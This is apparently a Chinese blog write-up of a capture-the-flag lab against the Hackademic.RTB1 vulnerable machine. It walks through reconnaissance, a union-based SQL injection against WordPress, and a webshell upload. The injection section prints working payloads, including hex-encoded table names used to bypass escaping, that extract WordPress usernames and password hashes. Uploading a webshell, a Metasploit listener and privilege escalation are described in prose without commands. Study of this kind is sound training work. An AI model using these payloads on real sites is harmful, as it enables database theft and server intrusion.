打靶记录-Hackademic.RTB1

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量47 收藏
点赞数
文章标签: 安全 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52922751/article/details/134132419
版权

靶场配置:

攻击机kali:192.168.224.128

靶机:给出c段192.168.224.0/24

1.信息搜集

1.1确认目标

利用nmap扫描

发现一个ip开启了80端口,在浏览器进行访问,确认该ip为目标机器

1.2.操作系统识别

该操作系统内核为linux2.6版本为32位系统

1.3.Web网页服务识别

1.4.目录扫描

利用dirsearch进行目录扫描

目录遍历漏洞

网页后台

2.漏洞利用

2.1.SQL注入

(1)点击Uncategorized发现以下内容,判断可能存在sql注入

(2)输入‘发现页面报错

(3)进一步测试,发现输入and 1=1 和 and 1=2页面异常,确定存在sql注入

(4)判断列数,order by 5不报错6报错,存在5列

(5)判断回显位置

(6)获取数据库名信息

?cat=0 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

  1. 获取wordpress中的表名

由于对单引号进行了转义操作所以将库名进行16进制编码绕过。

?cat=0 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x776f72647072657373

获取列名

?cat=0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=0x776f72647072657373 and table_name=0x77705f7573657273

(8)获取数据

?cat=0 union select 1,group_concat(user_login,0x2d,user_pass),3,4,5 from wordpress.wp_users

2.2.文件上传

(1)利用sql注入获取的用户数据进行登录

用户名:NickJames

密码:admin

成功进入后台

(2)发现该用户权限过低,使用GeorgeMiller进行登录,在后台开启上传功能,同时允许上传php文件

(3)上传webshell木马

4)利用哥斯拉连接

3.后渗透

3.1.Msf开启监听

3.2.制作木马

3.3.上传木马

利用python开启web服务远程下载木马

3.4.利用哥斯拉运行木马

3.5.提权

扫描可以利用的提权脚本

进行提权

提权成功,获得flag

Flag:$_d&jgQ>>ak\#b"(Hx"o<la_%

流星灬蝴蝶雨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之Hackademic RTB2 靶机渗透(万能密码 端口敲门 joomla1.5 SQL注入)
afei001
08-22 823
练习环境     攻击机:kali     靶机:Hackademic: RTB2     下载地址:https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip      1.发现靶机,端口扫描 root@kali:~# netdiscover -r 100.100.100.0/16 _____________________________________________________________________________ .
菜鸟驿站定制海康NVR DS-7604N-K1-RTB-V3.4.106-解锁固件包
10-15
DS-7604N-K1/RTB 版本号:V3.4.106 build 191014 设备升级有风险,请确认是否一定要升级设备。 请确认升级程序包是否适用于您的设备。 在设备升级过程中请勿断电。
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
Hackademic.RTB1靶场详细通关教程
weixin_59147806的博客
11-10 161
Hackademic.RTB1靶场详细通关教程,包括getshell、提权及flag获取
Hackademic.RTB1 靶机渗透测试流程
RemedyVI的博客
07-17 334
信息收集知道使用了wordpressCMS,通过SQL注入得到后台登录的users表,登录后台通过主题文件修改得到反弹shell,最后利用系统漏洞提权,总体来说靶机难度很简单。
渗透测试靶机---Hackademic.RTB1
久恙502的博客
11-01 175
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Hackademic.RTB1-渗透报告
weixin_73942557的博客
10-30 138
找出服务器存在的安全隐患,和服务器管理员的相关人员的不安全行为,因此本次渗透流程采用黑盒测试。建议将网站的后台界面做有效的安全性处理,对用户的访问权限做有效的限制,对接受的参数做有效的安全性校验和过滤。这个靶机主要是利用泄露的敏感目录,然后访问到后台页面,通过注入漏洞拿到后台管理员的密码,从而造成服务器权限的丢失。找出目标服务器存在的脆弱性、威胁面、影响范围等多维度的安全问题,为服务器和网站的后续加固提供思路。减低敏感目录权限,对url接受的参数加上有效的校验和过滤,固定文件上传的类型。
hackademic.RTB1(利用php_reverse_shell)
JyajT的博客
04-23 320
针对vulhub的练习
Hackademic.RTB1
weixin_44770698的博客
12-08 322
靶场练习
Hackademic.RTB1渗透打靶流程
qq_65580890的博客
10-31 83
nmap -p1-65535 -sV 192.168.142.173(端口和服务)在web服务器上访问这两个端口:80端口。有Hackademic.RTB1渗透。Url中有后面,看看是否是sql注入。
OpenRTB-Native-Ads-Specification-Final-1.2.pdf
05-16
openRTB文档,关于native格式
开源项目-vanilla-rtb-extensions.zip
09-03
开源项目-vanilla-rtb-extensions.zip,Awesome Golang features to generate C library code and bindings for Golang, Node.js, Python and PHP
OpenRTB-API-Specification-Version-2-5-FINAL.pdf
06-28
OpenRTB 2.5最新英文版 没有 中文版
rta-label-paper-final.pdf
09-22
互联网成人内容监管与RTA标签 本文档介绍了成人内容在互联网上的监管问题,以及RTA标签的重要性。RTA标签是一种自愿标签系统,旨在帮助父母和监护人保护未成年人免受不适宜的成人内容的影响。 ...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 194
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 521
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 143
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 410
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
stack_depot_disable=on kasan.stacktrace=off kvm-arm.mode=protected cgroup_disable=pressure qcom_dma_heaps.enable_bitstream_contig_heap=y kpti=0 ssbd=force-off lpm_levels.sleep_disabled=1 video=vfb:640x400,bpp=32,memsize=3072000 msm_rtb.filter=0x237 service_locator.enable=1 swiotlb=4096 firmware_class.path=/vendor/firmware_mnt/image loop.max_part=7 kvm-arm.mode=nvhe hibernate=nocompress noswap_randomize pcie_ports=compat console=ttyMSM0,115200n8 earlycon=qcom_geni,0xa90000 qcom_geni_serial.con_enabled=1 slub_debug=FZPU bootconfig buildvariant=userdebug rootwait ro init=/init resume=/dev/sda13
06-03
- msm_rtb.filter=0x237:设置 MSM RTB 过滤器。 - service_locator.enable=1:启用服务定位器。 - swiotlb=4096:设置 I/O 内存管理器的缓冲区大小。 - firmware_class.path=/vendor/firmware_mnt/image:设置固件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值